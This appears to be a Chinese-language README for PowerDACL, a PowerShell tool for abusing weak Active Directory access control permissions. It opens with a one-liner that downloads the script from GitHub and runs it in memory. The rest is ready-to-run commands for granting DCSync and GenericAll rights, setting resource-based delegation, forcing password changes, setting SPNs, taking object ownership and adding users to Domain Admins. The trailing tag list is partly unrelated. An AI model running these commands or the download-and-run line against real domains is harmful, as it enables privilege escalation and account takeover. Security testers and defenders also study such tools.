Leo4j/PowerDACL

# PowerDACL 一款用于滥用 Active Directory 自由访问控制列表 (DACL) 和访问控制项 (ACE) 弱权限的工具。 ## 在内存中加载 PowerDACL ``` iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/PowerDACL/main/PowerDACL.ps1') ``` ## 帮助页面 ``` PowerDACL ``` ## 授予 DCSync 权限 ``` DCSync -Target username -TargetDomain ferrari.local -TargetServer dc01.ferrari.local ``` ## 授予 GenericAll 权限 ``` GenericAll -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Grantee username ``` ``` GenericAll -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Grantee username -GranteeDomain domain.local -GranteeServer dc02.domain.local ``` ## 设置 RBCD: ``` RBCD -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Grantee username ``` ``` RBCD -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Grantee username -GranteeDomain domain.local -GranteeServer dc02.domain.local ``` ``` RBCD -Clear -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local ``` ## 将计算机添加到域 ``` AddComputer -ComputerName evilcomputer -Password P@ssw0rd! -Domain ferrari.local -Server dc01.ferrari.local ``` ``` AddComputer -ComputerName evilcomputer -Domain ferrari.local -Server dc01.ferrari.local ``` ## 从域中删除计算机 ``` DeleteComputer -ComputerName evilcomputer -Domain ferrari.local -Server dc01.ferrari.local ``` ## 强制更改密码 ``` ForceChangePass -Target username -Password P@ssw0rd! -TargetDomain ferrari.local -TargetServer dc01.ferrari.local ``` ## 设置 SPN: ``` SetSPN -Target username -TargetDomain ferrari.local -TargetServer dc01.ferrari.local ``` ``` SetSPN -Target username -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -SPN "test/test" ``` ## 移除 SPN: ``` RemoveSPN -Target username -TargetDomain ferrari.local -TargetServer dc01.ferrari.local ``` ## 设置所有者 ``` SetOwner -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Owner username ``` ``` SetOwner -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Owner username -OwnerDomain domain.local -OwnerServer dc02.domain.local ``` ## 启用账户 ``` EnableAccount -Target myComputer$ -Domain ferrari.local -Server dc01.ferrari.local ``` ## 禁用账户 ``` DisableAccount -Target myComputer$ -Domain ferrari.local -Server dc01.ferrari.local ``` ## 将对象添加到组 ``` AddToGroup -Target user -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Group "Domain Admins" ``` ``` AddToGroup -Target user -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Group "Domain Admins" -GroupDomain domain.local -GroupServer dc02.domain.local ``` ## 从组中移除对象 ``` RemoveFromGroup -Target user -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Group "Domain Admins" ``` ``` RemoveFromGroup -Target user -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Group "Domain Admins" -GroupDomain domain.local -GroupServer dc02.domain.local ``` ## 修改或清除对象的属性 ``` Set-DomainObject -Identity user -Set @{'userprincipalname' = "user@domain.com"} ``` ``` Set-DomainObject -Identity user -Clear 'userprincipalname' ``` ## Shadow Credentials https://github.com/Leo4j/KeyCredentialLink

标签：ACE, ACL 后门, Active Directory, AD 安全, AI合规, Checkov, CTF学习, DACL, DCSync, IPv6, Libemu, Libemu, PE 加载器, Plaso, PowerShell, RBCD, Terraform 安全, Web报告查看器, 二进制发布, 内网渗透, 协议分析, 反取证, 域渗透, 域环境, 基于资源的约束委派, 多人体追踪, 安全评估, 开源工具, 弱权限, 权限提升, 权限滥用, 横向移动, 电子数据取证, 编程规范, 访问控制列表